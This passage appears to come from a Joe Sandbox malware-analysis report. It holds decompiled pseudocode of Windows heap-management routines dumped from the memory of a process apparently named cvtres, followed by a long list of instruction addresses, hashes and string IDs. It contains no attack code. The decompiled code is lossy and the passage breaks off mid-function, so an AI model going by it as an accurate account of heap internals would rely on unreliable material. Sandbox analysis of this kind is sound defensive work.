							E055CBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0566A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E055CA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E055CA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E055FD540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E055AB150();
								} else {
									E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E055AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x5696378 = 1;
									asm("int3");
									 *0x5696378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0565FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0566A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E055FD540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E055AB150();
													} else {
														E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E055AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x5696378 = 1;
														asm("int3");
														 *0x5696378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E055CA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E055CA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E055CBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0566A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E055FD540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E055AB150();
													} else {
														E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E055AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x5696378 = 1;
														asm("int3");
														 *0x5696378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E055CA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E055CA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E055CBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E055CBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                                        0x055c99ca
                                                                        0x055c99cc
                                                                        0x055c99df
                                                                        0x055c99e3
                                                                        0x055c99f8
                                                                        0x055c99fb
                                                                        0x055c99fb
                                                                        0x00000000
                                                                        0x055c9a48
                                                                        0x055c9a48
                                                                        0x055c9a4c
                                                                        0x055c9a51
                                                                        0x055c9a55
                                                                        0x055c9a61
                                                                        0x055c9a66
                                                                        0x055c9a68
                                                                        0x05611457
                                                                        0x0561145c
                                                                        0x0561145c
                                                                        0x055c9a68
                                                                        0x055c9a6e
                                                                        0x055c9a71
                                                                        0x055c9a74
                                                                        0x055c9a76
                                                                        0x05611466
                                                                        0x05611469
                                                                        0x05611469
                                                                        0x0561146c
                                                                        0x0561146e
                                                                        0x05611471
                                                                        0x05611474
                                                                        0x05611477
                                                                        0x05611479
                                                                        0x0561159c
                                                                        0x0561159c
                                                                        0x0561159d
                                                                        0x056115a6
                                                                        0x056115ab
                                                                        0x056115ab
                                                                        0x00000000
                                                                        0x056115ab
                                                                        0x0561147f
                                                                        0x05611481
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561148a
                                                                        0x0561148d
                                                                        0x05611493
                                                                        0x05611495
                                                                        0x056114c0
                                                                        0x056114c0
                                                                        0x056114c3
                                                                        0x056114c6
                                                                        0x056114c8
                                                                        0x056114cb
                                                                        0x056114cf
                                                                        0x056114f2
                                                                        0x056114f2
                                                                        0x056114f5
                                                                        0x056114f8
                                                                        0x05611501
                                                                        0x05611508
                                                                        0x0561150b
                                                                        0x0561150e
                                                                        0x05611510
                                                                        0x05611513
                                                                        0x05611515
                                                                        0x05611515
                                                                        0x05611518
                                                                        0x05611518
                                                                        0x05611513
                                                                        0x05611521
                                                                        0x05611525
                                                                        0x0561152a
                                                                        0x0561152d
                                                                        0x05611530
                                                                        0x05611532
                                                                        0x05611539
                                                                        0x0561153d
                                                                        0x0561155d
                                                                        0x05611562
                                                                        0x0561153f
                                                                        0x05611555
                                                                        0x0561155a
                                                                        0x05611570
                                                                        0x05611577
                                                                        0x0561157c
                                                                        0x05611582
                                                                        0x05611585
                                                                        0x05611589
                                                                        0x0561158b
                                                                        0x05611592
                                                                        0x05611593
                                                                        0x05611593
                                                                        0x05611589
                                                                        0x05611530
                                                                        0x00000000
                                                                        0x056114f8
                                                                        0x056114d5
                                                                        0x056114da
                                                                        0x056114dc
                                                                        0x00000000
                                                                        0x056114de
                                                                        0x056114e8
                                                                        0x00000000
                                                                        0x056114e8
                                                                        0x05611497
                                                                        0x05611497
                                                                        0x056114a4
                                                                        0x056114a4
                                                                        0x056114a7
                                                                        0x056114a9
                                                                        0x056114ab
                                                                        0x056114ab
                                                                        0x0561149c
                                                                        0x0561149e
                                                                        0x056114a0
                                                                        0x056114b0
                                                                        0x056114b0
                                                                        0x00000000
                                                                        0x056114a2
                                                                        0x056114a2
                                                                        0x00000000
                                                                        0x056114a2
                                                                        0x056114a0
                                                                        0x056114b3
                                                                        0x056114bb
                                                                        0x00000000
                                                                        0x056114bb
                                                                        0x05611495
                                                                        0x055c9a7c
                                                                        0x055c9a7c
                                                                        0x055c9a7f
                                                                        0x055c9a7f
                                                                        0x055c9a82
                                                                        0x055c9a84
                                                                        0x055c9a87
                                                                        0x055c9a8a
                                                                        0x055c9a8d
                                                                        0x055c9a8f
                                                                        0x0561166a
                                                                        0x0561166a
                                                                        0x0561166b
                                                                        0x05611674
                                                                        0x00000000
                                                                        0x05611674
                                                                        0x055c9a95
                                                                        0x055c9a97
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055c9aa0
                                                                        0x055c9aa3
                                                                        0x055c9aa9
                                                                        0x055c9aab
                                                                        0x055c9ad7
                                                                        0x055c9ad7
                                                                        0x055c9ada
                                                                        0x055c9add
                                                                        0x055c9adf
                                                                        0x055c9ae2
                                                                        0x055c9ae6
                                                                        0x055c9b22
                                                                        0x055c9b27
                                                                        0x055c9b29
                                                                        0x00000000
                                                                        0x055c9b2b
                                                                        0x056115be
                                                                        0x00000000
                                                                        0x056115be
                                                                        0x055c9b29
                                                                        0x055c9ae8
                                                                        0x055c9ae8
                                                                        0x055c9aeb
                                                                        0x055c9aee
                                                                        0x056115cb
                                                                        0x056115d2
                                                                        0x056115d5
                                                                        0x056115d7
                                                                        0x056115da
                                                                        0x056115dc
                                                                        0x056115dc
                                                                        0x056115dc
                                                                        0x056115da
                                                                        0x056115e5
                                                                        0x056115e9
                                                                        0x056115ee
                                                                        0x056115f1
                                                                        0x056115f3
                                                                        0x056115f9
                                                                        0x05611600
                                                                        0x05611604
                                                                        0x05611624
                                                                        0x05611629
                                                                        0x05611606
                                                                        0x0561161c
                                                                        0x05611621
                                                                        0x05611637
                                                                        0x0561163e
                                                                        0x05611643
                                                                        0x05611649
                                                                        0x0561164c
                                                                        0x05611650
                                                                        0x05611656
                                                                        0x0561165d
                                                                        0x0561165e
                                                                        0x0561165e
                                                                        0x05611650
                                                                        0x056115f3
                                                                        0x055c9af4
                                                                        0x055c9af7
                                                                        0x055c9afc
                                                                        0x055c9b00
                                                                        0x055c9b04
                                                                        0x055c9b08
                                                                        0x055c9b14
                                                                        0x055c99fe
                                                                        0x055c9a04
                                                                        0x055c9a07
                                                                        0x00000000
                                                                        0x055c9a29
                                                                        0x0561169c
                                                                        0x056116a0
                                                                        0x056116a5
                                                                        0x056116a9
                                                                        0x056116b5
                                                                        0x056116ba
                                                                        0x056116bc
                                                                        0x056116be
                                                                        0x056116c3
                                                                        0x056116c3
                                                                        0x056116bc
                                                                        0x056116c8
                                                                        0x056116cc
                                                                        0x0561181b
                                                                        0x0561181b
                                                                        0x0561181e
                                                                        0x0561181e
                                                                        0x05611821
                                                                        0x05611823
                                                                        0x05611826
                                                                        0x05611829
                                                                        0x0561182c
                                                                        0x0561182e
                                                                        0x05611688
                                                                        0x05611688
                                                                        0x05611689
                                                                        0x0561168b
                                                                        0x0561168c
                                                                        0x0561168d
                                                                        0x0561168f
                                                                        0x05611692
                                                                        0x00000000
                                                                        0x05611692
                                                                        0x05611834
                                                                        0x05611836
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561183f
                                                                        0x05611842
                                                                        0x05611848
                                                                        0x0561184a
                                                                        0x05611875
                                                                        0x05611875
                                                                        0x05611878
                                                                        0x0561187b
                                                                        0x0561187d
                                                                        0x05611880
                                                                        0x05611884
                                                                        0x056118a7
                                                                        0x056118a7
                                                                        0x056118aa
                                                                        0x056118ad
                                                                        0x056118b6
                                                                        0x056118bd
                                                                        0x056118c0
                                                                        0x056118c3
                                                                        0x056118c5
                                                                        0x056118c8
                                                                        0x056118ca
                                                                        0x056118ca
                                                                        0x056118cd
                                                                        0x056118cd
                                                                        0x056118c8
                                                                        0x056118d5
                                                                        0x056118da
                                                                        0x056118df
                                                                        0x056118e2
                                                                        0x056118e5
                                                                        0x056118e7
                                                                        0x056118ee
                                                                        0x056118f2
                                                                        0x05611912
                                                                        0x05611917
                                                                        0x056118f4
                                                                        0x0561190a
                                                                        0x0561190f
                                                                        0x05611925
                                                                        0x0561192c
                                                                        0x05611931
                                                                        0x0561193a
                                                                        0x0561193e
                                                                        0x05611940
                                                                        0x05611947
                                                                        0x05611948
                                                                        0x05611948
                                                                        0x0561193e
                                                                        0x056118e5
                                                                        0x0561194f
                                                                        0x05611952
                                                                        0x05611956
                                                                        0x0561195d
                                                                        0x05611961
                                                                        0x0561196d
                                                                        0x00000000
                                                                        0x0561196d
                                                                        0x0561188a
                                                                        0x0561188f
                                                                        0x05611891
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561189d
                                                                        0x00000000
                                                                        0x0561189d
                                                                        0x0561184c
                                                                        0x05611859
                                                                        0x05611859
                                                                        0x0561185c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05611851
                                                                        0x05611853
                                                                        0x05611855
                                                                        0x05611865
                                                                        0x05611865
                                                                        0x05611866
                                                                        0x05611868
                                                                        0x05611870
                                                                        0x00000000
                                                                        0x05611870
                                                                        0x05611857
                                                                        0x05611857
                                                                        0x0561185e
                                                                        0x00000000
                                                                        0x056116d2
                                                                        0x056116d2
                                                                        0x056116d5
                                                                        0x056116d5
                                                                        0x056116d8
                                                                        0x056116da
                                                                        0x056116dd
                                                                        0x056116e0
                                                                        0x056116e3
                                                                        0x056116e5
                                                                        0x05611808
                                                                        0x05611808
                                                                        0x05611809
                                                                        0x05611812
                                                                        0x05611817
                                                                        0x05611817
                                                                        0x00000000
                                                                        0x05611817
                                                                        0x056116eb
                                                                        0x056116ed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056116f6
                                                                        0x056116f9
                                                                        0x056116ff
                                                                        0x05611701
                                                                        0x0561172c
                                                                        0x0561172c
                                                                        0x0561172f
                                                                        0x05611732
                                                                        0x05611734
                                                                        0x05611737
                                                                        0x0561173b
                                                                        0x0561175e
                                                                        0x0561175e
                                                                        0x05611761
                                                                        0x05611764
                                                                        0x0561176d
                                                                        0x05611774
                                                                        0x05611777
                                                                        0x0561177a
                                                                        0x0561177c
                                                                        0x0561177f
                                                                        0x05611781
                                                                        0x05611781
                                                                        0x05611784
                                                                        0x05611784
                                                                        0x0561177f
                                                                        0x0561178c
                                                                        0x05611791
                                                                        0x05611796
                                                                        0x05611799
                                                                        0x0561179c
                                                                        0x0561179e
                                                                        0x056117a5
                                                                        0x056117a9
                                                                        0x056117c9
                                                                        0x056117ce
                                                                        0x056117ab
                                                                        0x056117c1
                                                                        0x056117c6
                                                                        0x056117dc
                                                                        0x056117e3
                                                                        0x056117e8
                                                                        0x056117ee
                                                                        0x056117f1
                                                                        0x056117f5
                                                                        0x056117f7
                                                                        0x056117fe
                                                                        0x056117ff
                                                                        0x056117ff
                                                                        0x056117f5
                                                                        0x0561179c
                                                                        0x00000000
                                                                        0x05611764
                                                                        0x05611741
                                                                        0x05611746
                                                                        0x05611748
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05611754
                                                                        0x00000000
                                                                        0x05611754
                                                                        0x05611703
                                                                        0x05611710
                                                                        0x05611710
                                                                        0x05611713
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05611708
                                                                        0x0561170a
                                                                        0x0561170c
                                                                        0x0561171c
                                                                        0x0561171c
                                                                        0x0561171d
                                                                        0x0561171f
                                                                        0x05611727
                                                                        0x00000000
                                                                        0x05611727
                                                                        0x0561170e
                                                                        0x0561170e
                                                                        0x05611715
                                                                        0x00000000
                                                                        0x05611715
                                                                        0x056116cc
                                                                        0x055c9a45
                                                                        0x055c9a45
                                                                        0x055c9a0e
                                                                        0x055c9a1c
                                                                        0x055c9a23
                                                                        0x0561167e
                                                                        0x0561167f
                                                                        0x05611681
                                                                        0x05611683
                                                                        0x05611684
                                                                        0x00000000
                                                                        0x05611684
                                                                        0x00000000
                                                                        0x055c9aad
                                                                        0x055c9aad
                                                                        0x055c9ab0
                                                                        0x055c9ab3
                                                                        0x055c9ab3
                                                                        0x055c9ab6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055c9ab8
                                                                        0x055c9aba
                                                                        0x055c9abc
                                                                        0x055c9ac8
                                                                        0x055c9ac8
                                                                        0x00000000
                                                                        0x055c9abe
                                                                        0x055c9abe
                                                                        0x055c9ac0
                                                                        0x00000000
                                                                        0x055c9ac0
                                                                        0x055c9abc
                                                                        0x055c9ad2
                                                                        0x00000000
                                                                        0x055c9ad2
                                                                        0x055c9aab

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                        • API String ID: 0-3178619729
                                                                        • Opcode ID: 2d3696201ec77b402f3726cca2e459df91c5d07a465236618e8ee4693bb45a31
                                                                        • Instruction ID: 8b94fecc6cc277fc20fb5218977be0567e4ab0ed963d6c5a57ea2373ad9e1799
                                                                        • Opcode Fuzzy Hash: 2d3696201ec77b402f3726cca2e459df91c5d07a465236618e8ee4693bb45a31
                                                                        • Instruction Fuzzy Hash: 9022F1706002469FDB24DF68C895B7ABBF6FF46704F2885ADE9468B741E731E881CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055CB477 Relevance: 4.2, Strings: 3, Instructions: 405COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E055CB477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x569d360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E055CB8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E055EB640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x5698748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E055AB150();
						} else {
							E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E055AB150();
						__eflags =  *0x5697bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E05662073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x5698a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x569b1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E055E9730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E0566A80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E055E9660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E0566138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E0565FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E0566A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
